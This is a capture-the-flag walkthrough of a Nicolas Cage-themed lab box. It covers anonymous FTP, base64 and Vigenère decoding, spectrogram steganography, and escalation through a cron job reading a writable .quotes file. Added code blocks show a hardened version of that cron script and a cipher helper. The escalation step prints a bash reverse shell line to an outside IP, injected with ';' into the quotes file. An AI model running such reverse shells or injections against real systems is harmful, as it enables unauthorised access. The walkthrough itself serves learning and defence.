This looks like an interesting box, let’s start by running an nmap scan for all open ports and follow this up with a version scan:
So we have an FTP server on port 21 allowing anonymous login, OpenSSH on port 22 and an Apache httpd web server on port 80 with the title “Nicholas Cage Stories”.
FTP Server Port 21
We can see one file here called dad_tasks, let’s download it.
Looking at the file it appears to be encoded. Converting from base64 gives the following:
This looked like a cypher; however, having tried ROT13 and various others, I had no luck.
Port 80 — Web Server
We have a nice website for Mr Cage. We also have a potential user in his son, who is called Weston. Other than that, there is not a lot of functionality on the site and the source code does not reveal any additional information.
Anyway, time to launch Gobuster and look for hidden directories on the website. We find a number of directories, which we will visit in turn.
/images
Looks like all the images used on the website, nothing really interesting.
/html
Nothing really here
/scripts
Just a load of scripts, all very rubbish.
/contracts
Nothing in here.
/auditions
This looks more promising: there is a file called “must_practice_corrupt_file.mp3”. Let’s download it to our local machine using wget and have a look at it.
Listening to the file we hear Cage going through a scene, then the file appears to become corrupted and we get an almost random sound.
I am thinking some sort of steganography, whether audio or file based I am not sure. Running it through Binwalk did not disclose any hidden files, so time to analyse the audio. The tool I prefer to use for this is Sonic Visualiser.
Load the file into Sonic Visualiser, select ‘Pane’ and ‘Add Spectrogram’, all channels. Locate roughly where the noise starts and adjust the Colour. We can see some hidden text. Use the mouse wheel to zoom in if required.
Going back to the cypher we had earlier from the base64 decode.
We established that this was not ROT13 or any variation of it, but we can see it is some sort of cypher due to the structure of the text. Next we can try a Vigenère cypher using the text found in the audio steganography above as the key.
This gives us the password required for the challenge.
It works and the text is decoded and we may have the ssh passphrase for Weston, his son.
SSH Port 22
And we are in as user: weston
Looking around the /home directory there is nothing of interest. Checking the output of id, we can see that user weston is also a member of group cage.
Checking whether Weston has any sudo privileges, we can see the following:
We see he can run /usr/bin/bees; the owner is root, and weston has read and write access to the file. Taking a look at the file, we see:
I think this is a bit of a rabbit hole as I cannot see a way to add a reverse shell to this file.
Also, every so often a quote appears on the screen, which indicates that a cron job is being run in the background. This needs further exploring.
To make life easier I am going to send a bash shell back to a Pwncat listener, simply because it has much more functionality than the standard ssh shell, allowing additional functions such as upload, download and privesc enumeration.
To find out what is going on with the quote, I will upload and run pspy64 to monitor processes; hopefully we will be able to catch the cron job issuing the quote.
After a few minutes we get our cron job executed:
We can see that it is calling “python /opt/.dads_scripts/spread_the_quotes.py”, run as UID=1000, which is user cage. Let’s find all files for group cage.
find / -group cage 2>/dev/null
Let’s take a look at these files; they are located in a hidden directory under /opt/.dads_scripts.
Looking at the “spread_the_quotes.py” the code pulls a random quote from the .quotes file and then uses the wall command to issue the quote to all terminals. The .files directory contains the .quotes file:
Privesc to user cage
As the spread_the_quotes.py is run by user cage, we should be able to change the .quotes file to include a reverse shell and send this back to another listener to elevate our privilege to user cage.
To do this I will simply delete the .quotes file and create a new one containing a simple bash reverse shell.
echo ';bash -c "bash -i >& /dev/tcp/10.9.6.68/4444 0>&1"' > .quotes
The “;” is important so that we can break out of the wall command.
We then set up a listener on our local machine and wait for the cron job to execute.
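The fix a defender would apply to this cron job, as an added example: this is not the box’s spread_the_quotes.py (the page does not reproduce it) but a reconstruction that assumes the original spliced the quote into a shell command string, which is what the “;” trick relies on. It uses echo in place of wall so it runs anywhere, adds the ownership and permission check that would have rejected a .quotes file re-created by weston, and shows the argv-list form in which a “;” in the data is delivered as text rather than run as a command. The quotes and the “;echo MARKER” line are constructed here.

```python
import os
import random
import stat
import subprocess
import tempfile

# Constructed sample quotes; not the contents of the box's real .quotes file.
SAMPLE_QUOTES = [
    "Put the bunny back in the box.",
    "That is high praise coming from you.",
]


def write_sample_quotes(path, lines=SAMPLE_QUOTES):
    """Write a quotes file the way its owner should: one quote per line, mode 0600."""
    with open(path, "w") as f:
        f.write("\n".join(lines) + "\n")
    os.chmod(path, 0o600)


def pick_quote(path):
    """Return one random non-empty line, which is what the write-up says the script does."""
    with open(path) as f:
        lines = [line.rstrip("\n") for line in f if line.strip()]
    if not lines:
        raise ValueError("no quotes in %s" % path)
    return random.choice(lines)


def quote_file_is_trusted(path):
    """A data file consumed by a scheduled job must be a regular file, owned by the
    account running the job, and writable by nobody else. A file re-created by another
    group member (as in the write-up) fails the owner check; a group-writable file
    fails the mode check."""
    st = os.lstat(path)  # lstat: a symlink swapped in by another user is rejected too
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != os.geteuid():
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def broadcast_unsafe(quote, cmd="echo"):
    """Assumed reconstruction of the weak pattern the write-up abuses: the quote is
    spliced into a shell command string, so a ';' in the data starts a new command."""
    result = subprocess.run(cmd + " " + quote, shell=True, capture_output=True, text=True)
    return result.stdout


def broadcast_safe(quote, cmd="echo"):
    """Hardened form: an argv list and no shell, so the quote reaches the command
    verbatim whatever characters it contains."""
    result = subprocess.run([cmd, quote], capture_output=True, text=True)
    return result.stdout


def spread_the_quote(path, cmd="echo"):
    """Hardened equivalent of the cron job: refuse untrusted input, then broadcast safely."""
    if not quote_file_is_trusted(path):
        raise PermissionError("refusing %s: not a regular file owned by me with g-w,o-w" % path)
    return broadcast_safe(pick_quote(path), cmd)


def run_demo():
    """Exercise the permission check and both broadcast styles on a temporary file."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, ".quotes")
    write_sample_quotes(path)
    trusted_before = quote_file_is_trusted(path)
    quote = spread_the_quote(path).rstrip("\n")
    os.chmod(path, 0o664)  # the state the write-up relied on: group can write
    trusted_after = quote_file_is_trusted(path)
    marker = ";echo MARKER"  # constructed, benign stand-in for a crafted line
    return {
        "trusted_before": trusted_before,
        "quote": quote,
        "trusted_after": trusted_after,
        "unsafe_out": broadcast_unsafe(marker),
        "safe_out": broadcast_safe(marker),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print("%s: %r" % (name, value))
```

In the demo the shell-string version prints MARKER on its own line, i.e. the second command ran, while the argv version prints the literal text “;echo MARKER”. The ownership check matters as much as the no-shell call: the write-up did not edit the file in place but deleted and re-created it, so the replacement was owned by weston, and a job that insists on owning its own input would have refused it.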
Let’s take a look around /home/cage:
There is a file called Super_Duper_Checklist that looks interesting:
And we have the user flag
There is also an interesting directory /email_backup containing a number of emails which we can view:
email_1
email_2
email_3
This is a very strange email and we have some sort of encoded text or cypher. Also there are many references to “face”. This makes me think it is a Vigenère cypher with the key being “face”.
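The Vigenère decode is used twice in this write-up, on the base64-decoded dad_tasks file with the key read from the spectrogram and on the email text with the key “face”. As an added example, not code from the original post, here is the cipher and the base64-then-Vigenère chain in one place. The audio key and both ciphertexts are not reproduced on the page, so the sample message is constructed here and “face” is used as the illustrative key for both stages; ROT13 is included as the single-letter special case the write-up tried first.

```python
import base64
import codecs
import string

ALPHABET = string.ascii_uppercase


def vigenere(text, key, decrypt=False):
    """Classic Vigenère: shift each letter by the matching key letter. Non-letters pass
    through unchanged and do not consume a key position, so spaces and punctuation in
    the ciphertext keep the key aligned; case is preserved."""
    shifts = [ALPHABET.index(c) for c in key.upper() if c in ALPHABET]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out = []
    i = 0
    for ch in text:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[i % len(shifts)]
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def rot13(text):
    """The first thing the write-up tried on the decoded file: a Vigenère whose whole key is the letter N."""
    return codecs.decode(text, "rot_13")


def decode_task_file(b64_blob, key):
    """The chain applied to dad_tasks: base64-decode the download, then Vigenère-decrypt."""
    ciphertext = base64.b64decode(b64_blob).decode("utf-8")
    return vigenere(ciphertext, key, decrypt=True)


# Constructed sample, not the box's file or password. "face" is the key the email
# section points at; the audio key is not on the page, so "face" stands in for both.
SAMPLE_PLAINTEXT = "Dad's tasks: feed the bees, practice the scene, do not share the password."
SAMPLE_KEY = "face"
SAMPLE_CIPHERTEXT = vigenere(SAMPLE_PLAINTEXT, SAMPLE_KEY)
SAMPLE_B64 = base64.b64encode(SAMPLE_CIPHERTEXT.encode("utf-8")).decode("ascii")


if __name__ == "__main__":
    after_b64 = base64.b64decode(SAMPLE_B64).decode("utf-8")
    print("base64 blob:   ", SAMPLE_B64)
    print("after base64:  ", after_b64)
    print("rot13 attempt: ", rot13(after_b64))
    print("vigenere(face):", decode_task_file(SAMPLE_B64, SAMPLE_KEY))
```

The structure clue the write-up mentions is visible in the sample too: word lengths, spaces and punctuation survive both base64 and Vigenère, which is why the blob still looks like a sentence after decoding and why a ROT13 attempt fails without changing that shape.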
Privesc to Root
Our assumption is correct and this appears to be a password. Sean is probably the root user, so let’s see if we can su as root.
su root
Let’s take a look around /root for interesting files:
Again we have the email_backup directory, let’s take a look at this:
We have two email files stored.
email_1
email_2
We have the root flag and the box is completed.
I really enjoyed this box, it was great fun. A big thank you to the developer whose link is below.